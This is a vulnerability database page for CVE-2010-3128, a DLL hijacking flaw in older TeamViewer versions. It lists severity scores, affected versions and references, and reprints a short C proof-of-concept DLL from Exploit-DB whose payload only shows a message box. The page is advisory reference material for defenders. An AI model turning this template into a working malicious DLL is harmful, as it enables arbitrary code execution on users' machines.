CVE-2010-3128 : Detail

CVE-2010-3128

1.75%V3
Network
2010-08-26
16h00 +00:00
2018-10-10
16h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Untrusted search path vulnerability in TeamViewer 5.0.8703 and earlier allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse dwmapi.dll that is located in the same folder as a .tvs or .tvc file.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 9.3 AV:N/AC:M/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 14734

Publication date : 2010-08-23 22h00 +00:00
Author : Glafkos Charalambous
EDB Verified : No

/* Exploit Title: TeamViewer <= 5.0.8703 DLL Hijacking Exploit (dwmapi.dll) Date: August 25, 2010 Author: Glafkos Charalambous (glafkos[@]astalavista[dot]com) Version: 5.0.8703 Tested on: Windows XP SP3 En Vulnerable extensions: .tvs .tvc Greetz: Astalavista, OffSEC, Exploit-DB */ #include <windows.h> #define DllExport __declspec (dllexport) BOOL WINAPI DllMain ( HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) { dll_hijack(); return 0; } int dll_hijack() { MessageBox(0, "TeamViewer DLL Hijacking!", "DLL Message", MB_OK); return 0; }

Products Mentioned

Configuraton 0

Teamviewer>>Teamviewer >> Version To (including) 5.0.8703

Teamviewer>>Teamviewer >> Version 1.85

Teamviewer>>Teamviewer >> Version 2.44

Teamviewer>>Teamviewer >> Version 3.6.5523

Teamviewer>>Teamviewer >> Version 4.1.8107

References

http://secunia.com/advisories/41112
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.exploit-db.com/exploits/14734
Tags : exploit, x_refsource_EXPLOIT-DB
http://www.vupen.com/english/advisories/2010/2174
Tags : vdb-entry, x_refsource_VUPEN